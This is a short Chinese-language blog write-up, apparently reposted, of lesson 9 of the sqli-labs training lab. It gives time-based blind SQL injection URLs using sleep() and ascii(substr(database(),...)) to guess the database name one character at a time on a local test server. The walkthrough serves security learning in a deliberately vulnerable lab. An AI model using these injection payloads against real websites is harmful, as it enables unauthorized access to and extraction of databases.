sqli-labs less9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

Posted superkrissv

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs less9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)相关的知识,希望对你有一定的参考价值。

技术分享图片

加and

http://localhost/sqli/Less-9/?id=1‘ and ‘1‘=‘1%23
http://localhost/sqli/Less-9/?id=1‘ and ‘1‘=‘2%23

技术分享图片

技术分享图片

页面没有变化,一瞬间没弄懂了,看了下源码

发现无论查询的结果是什么,显示都不会有区别

技术分享图片

学习一个函数

sleep(n)      休眠n秒

技术分享图片

5秒后出现结果

技术分享图片

和less8一样是盲注漏洞,构造请求

如果数据库名的第一个字符的ascii码不等于114 则休眠5s

http://localhost/sqli/Less-9/?id=1‘ and if(ascii(substr(database(),1,1))=114, 0, sleep(5))%23  

浏览器状态栏显示

技术分享图片

=115时没有延时,可以推测第一个字符为 ‘s‘

http://localhost/sqli/Less-9/?id=1‘ and if(ascii(substr(database(),1,1))=115, 0, sleep(5))%23  

技术分享图片

 

以上是关于sqli-labs less9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)的主要内容,如果未能解决你的问题,请参考以下文章

sqli-labs less33 GET- Bypass AddSlashes (GET型绕过addslashes() 函数的宽字节注入)

sqli-labs less2 GET - Error based - Intiger based (基于错误的GET整型注入)

sqli-labs less7 GET - Dump into outfile - String (导出文件GET字符型注入)

sqli-labs less4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

sqli-labs less41 GET -Blind based -Intiger -Stacked(GET型基于盲注的堆叠查询整型注入)

sqli-labs less40 GET -Blind based -String -Stacked(GET型基于盲注的堆叠查询字符型注入)